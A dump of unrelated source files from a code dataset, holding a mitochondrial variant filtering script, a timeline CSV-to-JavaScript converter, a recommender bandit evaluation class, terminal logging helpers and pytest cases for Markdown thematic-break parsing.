tumor and in normal sample\n# Precondition: sites have been filtered between RNA and DNA and only RNA-specific sites are reported in summary files\n\nimport os\nimport sys\nfrom mito_mutations import *\n\n# usage python Filter_TumorNormal_Heteroplasmies.py options\n# - Tumor_RNAspecific_summary_file: summary file with RNA-specific heteroplasmies in tumor\n# - Normal_RNAspecific_summary_file: sumary file with RNA-specific heteroplasmies in normal\n# - minimum_coverage: minimum read depth to keep positions \n\n\n# get the Tumor summary file\nSummaryTumor = sys.argv[1]\n# get the Normal summary file\nSummaryNormal = sys.argv[2]\n# get the folder with mitoseek RNA outputs for normal sample\n# get the minimum read depth\nminimum_coverage = int(sys.argv[3])\n# get the outputfile name\n\n\n\n# parse the summary files into a dict of dict {participantID: {position : [information]} \n# remove participants without tumor and normal data\n# remove positions with RNA-tumor variants that have no coverage (or less than threshold) in normal-tumor\n# correct sample size at each position\n\ncancer_name = SummaryTumor[SummaryTumor.index('Summary_') + len('Summary_') : SummaryTumor.index('tumor') -1]\nassert cancer_name == SummaryNormal[SummaryNormal.index('Summary_') + len('Summary_') : SummaryNormal.index('normal') -1], 'cancer names do not match'\n\n# verify that arguments are passed appropriately\nassert 'tumor' in SummaryTumor and 'normal' in SummaryNormal, 'summary files should be tumor and normal'\nprint('QCed files matching')\n\n# build outputfile with comand option arguments\noutputfile = 'HeteroplasmySummary_' + cancer_name + '_TumorSpecific.txt'\n\n# parse the summary files into a dict of dict {participantID: {position : [information]} \nTumor_snps = GetVariablePositions(SummaryTumor)\nNormal_snps = GetVariablePositions(SummaryNormal)\nprint('Tumor_snps', len(Tumor_snps))\nprint('Normal_snps', len(Normal_snps))\n\n# remove participants not in Tumor and Normal\nTumor_snps, Normal_snps = RemoveUniqueParticipants(Tumor_snps, Normal_snps)\nprint('N individuals in Tumor after removing unique participants', len(Tumor_snps))\n\nprint(os.getcwd())\n# move to directory containing the subfolders of the mitoseek RNA Normal outputs\nos.chdir('NT_RNASeq/')\nprint(os.getcwd())\n\n# remove positions with RNA variants that have not enough coverage in Normal RNA\nTumor_snps = RemovePositionWithoutCoverage(Tumor_snps, '_NT_RNASEQ', minimum_coverage)\nprint('N individuals in Tumor after removing positions without sufficient coverage', len(Tumor_snps))\n\n# move to the directory containing the subfolders of the mitoseek RNA outputs\nos.chdir('../TP_RNASeq/')\nprint(os.getcwd())\n\n# correct sample size at each position\n# get the sample size of individuals with RNAseq and WGS that have minimum coverage in RNA at each position\n# make a list of subfolders from RNA mitoseek outputs\nRNASubFolders = [i for i in os.listdir('./')]\nto_delete = []\nfor i in RNASubFolders:\n try:\n os.listdir(i)\n except:\n to_delete.append(i)\n else:\n if i[:i.index('_TP_RNASEQ')] not in Tumor_snps:\n to_delete.append(i)\nfor i in to_delete:\n RNASubFolders.remove(i)\n# create a dict with position 0-based {position: number of indidivuals} \nsample = {}\n# loop over directories\nfor subfolder in RNASubFolders:\n # get basecall file\n infile = open(subfolder + '/' + 'mito1_basecall.txt', 'r')\n # skip header\n infile.readline()\n # loop over file\n for line in infile:\n line = line.rstrip()\n if line != '':\n line = line.split('\\t')\n # get position 0-based\n position = int(line[1]) - 1\n # compute coverage\n reads = sum(list(map(lambda x: int(x), line[3:])))\n assert type(reads) == int, \"reads should be an integer\"\n # do not consider positions with read depth < minimum\n if reads > minimum_coverage:\n # update dict with count\n sample[position] = sample.get(position, 0) + 1\n infile.close()\n# loop over participant\nfor ID in Tumor_snps:\n # loop over position\n for position in Tumor_snps[ID]:\n # get the sample size\n Tumor_snps[ID][position][11] = str(sample[position])\n\n# filter variants observed in Normal RNA from Tumor RNA variants\n# loop over participants in Tumor\nfor participant in Tumor_snps:\n # create a list of positions to remove\n to_delete = []\n # loop over positions\n for position in Tumor_snps[participant]:\n # check if position is recorded in WGS\n if position in Normal_snps[participant]:\n # remove variable positions regardless of the variants themselves\n to_delete.append(position)\n print('delete {0} positions in {1}'.format(len(to_delete), participant))\n if len(to_delete) != 0:\n for position in to_delete:\n del Tumor_snps[participant][position]\n\n# remove participants with no variants\nto_delete = [i for i in Tumor_snps if len(Tumor_snps[i]) == 0]\nprint('delete {0} individuals'.format(len(to_delete)))\nfor i in to_delete:\n del Tumor_snps[i]\nprint('N individual in tumor after filtering variants in Normal', len(Tumor_snps))\n\n\n# create a dict with position as key and list of lists with info for all participants\n# {position : [[information_ID1], [information_ID2]}\nRNA_variants = {}\nfor ID in Tumor_snps:\n # get positions\n for position in Tumor_snps[ID]:\n if position in RNA_variants:\n RNA_variants[position].append(Tumor_snps[ID][position])\n else:\n RNA_variants[position] = [Tumor_snps[ID][position]]\n# create a list of positions\npositions = [i for i in RNA_variants]\npositions.sort()\n\n# move to parent directory in which the script was launched\nos.chdir('../')\n\n# open file for writing\nnewfile = open(outputfile, 'w')\n# write header to file\nheader = ['Position', 'Participant', 'Gene', 'Orientation', 'Exon_effect',\n 'AA_change', 'Reference', 'Major', 'Minor', 'Major_count', 'Minor_count',\n 'Sample_size', 'Forward_A', 'Forward_T', 'Forward_C', 'Forward_G', \n 'Reverse_A', 'REverse_T', 'Reverse_C', 'Reverse_G', 'FisherPval']\nnewfile.write('\\t'.join(header) + '\\n')\n\n# loop over positions\nfor i in positions:\n # loop over each SNP at that position for all participants\n for j in RNA_variants[i]:\n # write info to file, has already position 1-based and participant ID\n newfile.write('\\t'.join(j) + '\\n')\n\nnewfile.close()\n\n","repo_name":"rjovelin/MitoVariants","sub_path":"Filter_TumorNormal_Heteroplasmies.py","file_name":"Filter_TumorNormal_Heteroplasmies.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17708883985","text":" # Convert google doc spreadsheet format for timelinejs to json file\r\n# useful if you want to experiment using google doc but eventually\r\n# host everything yourself privately.\r\n\r\n# Example: go to google docs spreadsheet and do File -> Download As -> CSV (Comma Separated Values)\r\n# save as timeline.csv, run this, you get a timeline.json out\r\n#\r\n# Or look at your google doc ID long string like for example 1xTn9OSdmnxbBtQcKxZYV-xXkKoOpPSu6AUT0LXXszHo\r\n# wget -qO timeline.csv 'https://docs.google.com/spreadsheets/d/1xTn9OSdmnxbBtQcKxZYV-xXkKoOpPSu6AUT0LXXszHo/pub?output=csv'\r\n\r\nimport csv\r\nimport json\r\n\r\ncsvfile = open('timeline_data.csv', newline='', encoding='utf8')\r\noutfile = open('timeline_data.js', 'w', newline='')\r\nreader = csv.DictReader(csvfile)\r\n\r\ndata = {}\r\nevents = []\r\n#eras = []\r\ndata['events'] = events\r\n#data['eras'] = eras\r\n\r\nMONTHS = 12 # amount of max months in a year\r\nDAYS = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\n\r\n\r\n# def check_event(event):\r\n# assert int(event['start_date']['year']) # check every event has start year\r\n# if int(event['start_date']['year']) > 6000:\r\n# print(\"Warning: An event has year > 6000\" + event['end_date']['year'])\r\n# if int(event['start_date']['year']) < -6000:\r\n# print(\"Warning: An event has year < -6000\" + event['end_date']['year'])\r\n# # unlike spec says, headline IS required, else JSON cannot load\r\n# assert 'text' in event, \"Event has no headline: \" + event['start_date']['year']\r\n# assert 'headline' in event['text'], \"Event has no headline\" + event['start_date']['year']\r\n# if 'month' in event['start_date']:\r\n# check_month(int(event['start_date']['month']))\r\n# if 'day' in event['start_date']:\r\n# assert 'month' in event['start_date'], \"event with start_day but no start_month\"\r\n# check_day(int(event['start_date']['month']), int(event['start_date']['day']))\r\n# if 'end_date' in event:\r\n# if int(event['end_date']['year']) > 6000:\r\n# print(\"Warning: An event has year > 6000\" + event['end_date']['year'])\r\n# if int(event['end_date']['year']) < -6000:\r\n# print(\"Warning: An event has year < -6000: \" + event['end_date']['year'])\r\n# if 'month' in event['end_date']:\r\n# check_month(int(event['end_date']['month']))\r\n# if 'day' in event['end_date']:\r\n# assert 'month' in event['end_date'], \"event with end_day but no end_month\"\r\n# check_day(int(event['end_date']['month']), int(event['end_date']['day']))\r\n\r\n\r\ndef check_month(month):\r\n assert month < 13, \"event with month > 12: \" + str(month)\r\n assert month > 0, \"event with month < 1: \" + str(month)\r\n\r\n\r\ndef check_day(month, day):\r\n assert day > 0\r\n assert day <= DAYS[month-1], \"event with day not in month: \" + str(month) + \" \" + str(day)\r\n\r\n\r\n# Didn't support 'End Time': '', 'Time': ''\r\nkeymap = {'Media': 'mediaUrl', 'Media Caption': 'mediaCaption', 'Media Thumbnail': 'mediaThumbnail',\r\n 'Month': 'start_date_month', 'Day': 'start_date_day', 'Year': 'start_date_year',\r\n 'End Month': 'end_date_month', 'End Day': 'end_date_day', 'End Year': 'end_date_year',\r\n 'Headline': 'text_headline', 'Text': 'text_text',\r\n 'Group': 'group', 'Display Date': 'display_date', 'Period': 'period'}\r\n\r\nmonthmap = {'january': 1, 'february': 2, 'march': 3, 'april': 4, 'may': 5, 'june':6, 'july': 7, 'august': 8,\r\n 'september': 9, 'october': 10, 'november': 11, 'december': 12}\r\n\r\noutfile.write(\"let timelineData = [\\n\")\r\n\r\n\r\ndef escape(param):\r\n string = json.dumps(param)\r\n string = string.replace(\"'\", \"\\\\'\")\r\n # print(string)\r\n return string\r\n\r\n\r\nfor row in reader:\r\n outfile.write(\"{\\n\")\r\n event = {}\r\n for a in keymap:\r\n # print(\"Newline? \\n\")\r\n if row[a]:\r\n if keymap[a] == 'start_date_month' or keymap[a] == 'end_date_month':\r\n if row[a] in monthmap:\r\n outfile.write(keymap[a] + \" : \\\"\" + escape(monthmap[row[a]]) + \"\\\" ,\\n\")\r\n else:\r\n outfile.write(keymap[a] + \" : \" + escape(row[a]) + \" ,\\n\")\r\n if '|' in keymap[a]:\r\n #\r\n (x, y)= keymap[a].split(\"|\")\r\n if not x in event: event[x] = {}\r\n event[x][y] = row[a]\r\n else:\r\n event[keymap[a]] = row[a]\r\n\r\n outfile.write(\"},\\n\")\r\n# print(events)\r\noutfile.write(\"];\")\r\n\r\n#json.dump(events, outfile, sort_keys=True, indent=4)\r\n\r\n","repo_name":"fedorbeets/Chronology","sub_path":"data/timeline_data_csv_to_js.py","file_name":"timeline_data_csv_to_js.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32193767462","text":"#!/usr/bin/python3\n\nfrom typing import List #class\nfrom typing import Dict #class\n\nfrom evaluationTool.aEvalTool import AEvalTool #class\n\nfrom pandas.core.frame import DataFrame #class\nfrom pandas.core.frame import Series #class\n\nimport numpy as np\n\nclass EvalToolDHondtBanditVotes(AEvalTool):\n def __init__(self, argumentsDict:Dict[str,object]):\n if type(argumentsDict) is not dict:\n raise ValueError(\"Argument argumentsDict isn't type dict.\")\n\n def click(self, userID:int, rItemIDsWithResponsibility:List, clickedItemID:int, portfolioModel:DataFrame, argumentsDict:Dict[str,object]):\n if type(userID) is not int and type(userID) is not np.int64:\n raise ValueError(\"Argument userID isn't type int.\")\n if type(rItemIDsWithResponsibility) is not list:\n raise ValueError(\"Argument rItemIDsWithResponsibility isn't type list.\")\n #if type(clickedItemID) is not int and type(clickedItemID) is not np.int64:\n # raise ValueError(\"Argument clickedItemID isn't type int.\")\n if not isinstance(portfolioModel, DataFrame):\n raise ValueError(\"Argument pModelDF isn't type DataFrame.\")\n if list(portfolioModel.columns) != ['r', 'n', 'alpha0', 'beta0']:\n raise ValueError(\"Argument pModelDF doen't contain rights columns.\")\n if type(argumentsDict) is not dict:\n raise ValueError(\"Argument argumentsDict isn't type dict.\")\n\n aggrItemIDsWithRespDF:DataFrame = DataFrame(rItemIDsWithResponsibility, columns=[\"itemId\", \"responsibility\"])\n aggrItemIDsWithRespDF.set_index(\"itemId\", inplace=True)\n\n #EvalToolDHont.linearNormalizingPortfolioModelDHont(portfolioModel)\n\n #evaluationDict[AEvalTool.CLICKS] = evaluationDict.get(AEvalTool.CLICKS, 0) + 1\n\n # responsibilityDict:dict[methodID:str, votes:float]\n responsibilityDict:dict[str, float] = aggrItemIDsWithRespDF.loc[clickedItemID][\"responsibility\"]\n\n # increment portfolio model\n for methodIdI in responsibilityDict.keys():\n rowI:Series = portfolioModel.loc[methodIdI]\n rowI['r'] += responsibilityDict[methodIdI]\n #rowI['n'] += 1 - responsibilityDict[methodIdI]\n #relevance_this = responsibilityDict[methodIdI]\n #relevance_others = sumMethodsVotes - relevance_this\n #update_step = self.learningRateClicks * (relevance_this - relevance_others)\n # elif action == \"storeViews\":\n # update_step = -1 * learningRateViews * (relevance_this - relevance_others)\n # pos_step = 0\n #portfolioModel.loc[methodIdI] = portfolioModel.loc[methodIdI] + update_step\n # Apply constraints on maximal and minimal volumes of votes\n #if portfolioModel.loc[methodIdI, 'votes'] < self.minVotesConst:\n # portfolioModel.loc[methodIdI, 'votes'] = self.minVotesConst\n #elif portfolioModel.loc[methodIdI, 'votes'] > self.maxVotesConst:\n # portfolioModel.loc[methodIdI, 'votes'] = self.maxVotesConst\n\n # linearly normalizing to unit sum of votes\n #EvalToolDHont.linearNormalizingPortfolioModelDHont(portfolioModel)\n\n print(\"HOP\")\n print(\"clickedItemID: \" + str(clickedItemID))\n print(portfolioModel)\n\n def displayed(self, userID:int, rItemIDsWithResponsibility:List, portfolioModel:DataFrame, argumentsDict:Dict[str,object]):\n if type(userID) is not int and type(userID) is not np.int64:\n raise ValueError(\"Argument userID isn't type int.\")\n if type(rItemIDsWithResponsibility) is not list:\n raise ValueError(\"Argument rItemIDsWithResponsibility isn't type list.\")\n if not isinstance(portfolioModel, DataFrame):\n raise ValueError(\"Argument pModelDF isn't type DataFrame.\")\n if list(portfolioModel.columns) != ['r', 'n', 'alpha0', 'beta0']:\n raise ValueError(\"Argument pModelDF doen't contain rights columns.\")\n if type(argumentsDict) is not dict:\n raise ValueError(\"Argument argumentsDict isn't type dict.\")\n\n aggrItemIDsWithRespDF:DataFrame = DataFrame(rItemIDsWithResponsibility, columns=[\"itemId\", \"responsibility\"])\n aggrItemIDsWithRespDF.set_index(\"itemId\", inplace=True)\n\n # responsibilityDict:dict[methodID:str, votes:float]\n # iterate over all recommended items, penalize their methods\n for index, responsibilityI in aggrItemIDsWithRespDF.iterrows():\n responsibilityDict:dict[str,float] = responsibilityI[\"responsibility\"]\n\n # increment portfolio model\n for methodIdI in responsibilityDict.keys():\n relevance_this:float = responsibilityDict.get(methodIdI)\n portfolioModel.loc[methodIdI]['n'] += relevance_this \n","repo_name":"sbalcar/HeterRecomPortfolio","sub_path":"src/evaluationTool/evalToolDHondtBanditVotes.py","file_name":"evalToolDHondtBanditVotes.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25642016782","text":"#---------------------------------------------\n# Terminal output functions\n#---------------------------------------------\nfrom src.param import param_edge\n\nimport time\n\n\ndef addLog(type, message):\n if(type == \"#\"):\n print(\"[\\033[1;34m#\\033[0m] \"+ message)\n elif(type == \"OK\"):\n print(\"[\\033[1;32mOK\\033[0m] \"+ message)\n elif(type == \"error\"):\n print(\"[\\033[1;31merror\\033[0m] \"+ message)\n elif(type == \"com\"):\n print(\"[\\033[1;30mPOST\\033[0m] \"+ message)\n time.sleep(param_edge.tic_message)\n\ndef addConnection(dest, state):\n if(dest == \"edge\"):\n dest = \"Edge AI module\"\n elif(dest == \"capture\"):\n dest = \"Train module\"\n elif(dest == \"processing\"):\n dest = \"Data processing component\"\n elif(dest == \"component_ai\"):\n dest = \"AI component\"\n\n if(state == \"on\"):\n print(\"[\\033[1;36mCON\\033[0m] Connection \\033[1;32mON\\033[0m - \"+ dest)\n elif(state == \"off\"):\n print(\"[\\033[1;36mCON\\033[0m] Connection \\033[1;31mOFF\\033[0m - \"+ dest)\n\ndef addPost(dest, c1, c2, c3):\n if(dest == \"edge\"):\n message = \"Received [%s, %s, %s]\"%(c1, c2, c3)\n else:\n message = \"To %s [%s, %s, %s]\"%(dest, c1, c2, c3)\n\n print(\"[\\033[1;30mPOST\\033[0m] \" + message)\n time.sleep(param_edge.tic_message)\n\ndef addDaemon(type, status, message):\n if(type == \"#\"):\n print(\"[\\033[1;34m#\\033[0m] Daemon \", flush=True, end='')\n elif(type == \"OK\"):\n print(\"[\\033[1;32mOK\\033[0m] Daemon \", flush=True, end='')\n elif(type == \"error\"):\n print(\"[\\033[1;31merror\\033[0m] Daemon \", flush=True, end='')\n\n if(status == \"ON\"):\n print(\"\\033[1;32m\"+status+\"\\033[0m - \"+message)\n elif(status == \"OFF\"):\n print(\"\\033[1;31m\"+status+\"\\033[0m - \"+message)\n\n time.sleep(param_edge.tic_message)\n\ndef addLine():\n print(\"\")\n\ndef shutdown():\n addLine()\n addLine()\n print(\"[\\033[1;32mOK\\033[0m] Program shutdown ...\",)\n\ndef delai():\n print(\"[\\033[1;34m#\\033[0m] Daemon closing\", flush=True, end='')\n print(\"...2\", flush=True, end='')\n time.sleep(1)\n print(\"...1\", flush=True)\n time.sleep(1)\n\ndef fatal_error():\n print(\"\\033[1;31m--- Fatal error ---\\033[0m\")\n","repo_name":"nsviel/-Obstacle-Edge_orchestrator_component","sub_path":"src/utils/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72777910816","text":"\"\"\"\nhttps://github.github.com/gfm/#thematic-breaks\n\"\"\"\nfrom test.utils import act_and_assert\n\nimport pytest\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_013():\n \"\"\"\n Test case 013: A line consisting of 0-3 spaces of indentation, followed by a sequence of three or more matching -, _, or * characters, each followed optionally by any number of spaces or tabs, forms a thematic break.\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"***\n---\n___\"\"\"\n expected_tokens = [\n \"[tbreak(1,1):*::***]\",\n \"[tbreak(2,1):-::---]\",\n \"[tbreak(3,1):_::___]\",\n ]\n expected_gfm = \"\"\"
    \n
    \n
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_014():\n \"\"\"\n Test case 014: (part a) Wrong characters:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"+++\"\"\"\n expected_tokens = [\"[para(1,1):]\", \"[text(1,1):+++:]\", \"[end-para:::True]\"]\n expected_gfm = \"\"\"

    +++

    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_015():\n \"\"\"\n Test case 015: (part b) Wrong characters:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"===\"\"\"\n expected_tokens = [\"[para(1,1):]\", \"[text(1,1):===:]\", \"[end-para:::True]\"]\n expected_gfm = \"\"\"

    ===

    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_016():\n \"\"\"\n Test case 016: Not enough characters:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"--\n**\n__\"\"\"\n expected_tokens = [\n \"[para(1,1):\\n\\n]\",\n \"[text(1,1):--\\n::\\n]\",\n \"[text(2,1):**:]\",\n \"[text(2,3):\\n::\\n]\",\n \"[text(3,1):__:]\",\n \"[end-para:::True]\",\n ]\n expected_gfm = \"\"\"

    --\n**\n__

    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_017():\n \"\"\"\n Test case 017: One to three spaces indent are allowed:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\" ***\n ***\n ***\"\"\"\n expected_tokens = [\n \"[tbreak(1,2):*: :***]\",\n \"[tbreak(2,3):*: :***]\",\n \"[tbreak(3,4):*: :***]\",\n ]\n expected_gfm = \"\"\"
    \n
    \n
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_018():\n \"\"\"\n Test case 018: (part a) Four spaces is too many:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\" ***\"\"\"\n expected_tokens = [\n \"[icode-block(1,5): :]\",\n \"[text(1,5):***:]\",\n \"[end-icode-block:::True]\",\n ]\n expected_gfm = \"\"\"
    ***\n
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_019():\n \"\"\"\n Test case 019: (part b) Four spaces is too many:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"Foo\n ***\"\"\"\n expected_tokens = [\n \"[para(1,1):\\n ]\",\n \"[text(1,1):Foo\\n::\\n]\",\n \"[text(2,5):***:]\",\n \"[end-para:::True]\",\n ]\n expected_gfm = \"\"\"

    Foo\n***

    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_020():\n \"\"\"\n Test case 020: More than three characters may be used:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"_____________________________________\"\"\"\n expected_tokens = [\"[tbreak(1,1):_::_____________________________________]\"]\n expected_gfm = \"\"\"
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_021():\n \"\"\"\n Test case 021: (part a) Spaces are allowed between the characters:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\" - - -\"\"\"\n expected_tokens = [\"[tbreak(1,2):-: :- - -]\"]\n expected_gfm = \"\"\"
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_022():\n \"\"\"\n Test case 022: (part b) Spaces are allowed between the characters:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\" ** * ** * ** * **\"\"\"\n expected_tokens = [\"[tbreak(1,2):*: :** * ** * ** * **]\"]\n expected_gfm = \"\"\"
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_023():\n \"\"\"\n Test case 023: (part c) Spaces are allowed between the characters:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"- - - -\"\"\"\n expected_tokens = [\"[tbreak(1,1):-::- - - -]\"]\n expected_gfm = \"\"\"
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_024():\n \"\"\"\n Test case 024: Spaces are allowed at the end:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"- - - - \"\"\"\n expected_tokens = [\"[tbreak(1,1):-::- - - - ]\"]\n expected_gfm = \"\"\"
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_025():\n \"\"\"\n Test case 025: However, no other characters may occur in the line:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"_ _ _ _ a\n\na------\n\n---a---\"\"\"\n expected_tokens = [\n \"[para(1,1):]\",\n \"[text(1,1):_:]\",\n \"[text(1,2): :]\",\n \"[text(1,3):_:]\",\n \"[text(1,4): :]\",\n \"[text(1,5):_:]\",\n \"[text(1,6): :]\",\n \"[text(1,7):_:]\",\n \"[text(1,8): a:]\",\n \"[end-para:::True]\",\n \"[BLANK(2,1):]\",\n \"[para(3,1):]\",\n \"[text(3,1):a------:]\",\n \"[end-para:::True]\",\n \"[BLANK(4,1):]\",\n \"[para(5,1):]\",\n \"[text(5,1):---a---:]\",\n \"[end-para:::True]\",\n ]\n expected_gfm = \"\"\"

    _ _ _ _ a

    \n

    a------

    \n

    ---a---

    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_026():\n \"\"\"\n Test case 026: It is required that all of the non-whitespace characters be the same. So, this is not a thematic break:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\" *-*\"\"\"\n expected_tokens = [\n \"[para(1,2): ]\",\n \"[emphasis(1,2):1:*]\",\n \"[text(1,3):-:]\",\n \"[end-emphasis(1,4)::]\",\n \"[end-para:::True]\",\n ]\n expected_gfm = \"\"\"

    -

    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_027():\n \"\"\"\n Test case 027: Thematic breaks do not need blank lines before or after:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"- foo\n***\n- bar\"\"\"\n expected_tokens = [\n \"[ulist(1,1):-::2:]\",\n \"[para(1,3):]\",\n \"[text(1,3):foo:]\",\n \"[end-para:::True]\",\n \"[end-ulist:::True]\",\n \"[tbreak(2,1):*::***]\",\n \"[ulist(3,1):-::2:]\",\n \"[para(3,3):]\",\n \"[text(3,3):bar:]\",\n \"[end-para:::True]\",\n \"[end-ulist:::True]\",\n ]\n expected_gfm = \"\"\"
      \n
    • foo
    • \n
    \n
    \n
      \n
    • bar
    • \n
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_028():\n \"\"\"\n Test case 028: Thematic breaks can interrupt a paragraph:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"Foo\n***\nbar\"\"\"\n expected_tokens = [\n \"[para(1,1):]\",\n \"[text(1,1):Foo:]\",\n \"[end-para:::False]\",\n \"[tbreak(2,1):*::***]\",\n \"[para(3,1):]\",\n \"[text(3,1):bar:]\",\n \"[end-para:::True]\",\n ]\n expected_gfm = \"\"\"

    Foo

    \n
    \n

    bar

    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_029():\n \"\"\"\n Test case 029: If a line of dashes that meets the above conditions for being a thematic break could also be interpreted as the underline of a setext heading, the interpretation as a setext heading takes precedence. Thus, for example, this is a setext heading, not a paragraph followed by a thematic break:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"Foo\n---\nbar\"\"\"\n expected_tokens = [\n \"[setext(2,1):-:3::(1,1)]\",\n \"[text(1,1):Foo:]\",\n \"[end-setext::]\",\n \"[para(3,1):]\",\n \"[text(3,1):bar:]\",\n \"[end-para:::True]\",\n ]\n expected_gfm = \"\"\"

    Foo

    \n

    bar

    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_030():\n \"\"\"\n Test case 030: When both a thematic break and a list item are possible interpretations of a line, the thematic break takes precedence:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"* Foo\n* * *\n* Bar\"\"\"\n expected_tokens = [\n \"[ulist(1,1):*::2:]\",\n \"[para(1,3):]\",\n \"[text(1,3):Foo:]\",\n \"[end-para:::True]\",\n \"[end-ulist:::True]\",\n \"[tbreak(2,1):*::* * *]\",\n \"[ulist(3,1):*::2:]\",\n \"[para(3,3):]\",\n \"[text(3,3):Bar:]\",\n \"[end-para:::True]\",\n \"[end-ulist:::True]\",\n ]\n expected_gfm = \"\"\"
      \n
    • Foo
    • \n
    \n
    \n
      \n
    • Bar
    • \n
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_031():\n \"\"\"\n Test case 031: If you want a thematic break in a list item, use a different bullet:\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"\n- Foo\n- * * *\"\"\"\n expected_tokens = [\n \"[BLANK(1,1):]\",\n \"[ulist(2,1):-::2:]\",\n \"[para(2,3):]\",\n \"[text(2,3):Foo:]\",\n \"[end-para:::True]\",\n \"[li(3,1):2::]\",\n \"[tbreak(3,3):*::* * *]\",\n \"[end-ulist:::True]\",\n ]\n expected_gfm = \"\"\"
      \n
    • Foo
    • \n
    • \n
      \n
    • \n
    \"\"\"\n\n # Act & Assert\n act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_031o():\n \"\"\"\n Test case 031o: variation on 31 with ordered list\n \"\"\"\n\n # Arrange\n source_markdown = \"\"\"\n1) Foo\n1) * * *\"\"\"\n expected_tokens = [\n \"[BLANK(1,1):]\",\n \"[olist(2,1):):1:3:]\",\n \"[para(2,4):]\",\n \"[text(2,4):Foo:]\",\n \"[end-para:::True]\",\n \"[li(3,1):3::1]\",\n \"[tbreak(3,4):*::* * *]\",\n \"[end-olist:::True]\",\n ]\n expected_gfm = \"\"\"
      \n
    1. Foo
    2. \n
    3. \n
      \n
    4. \n
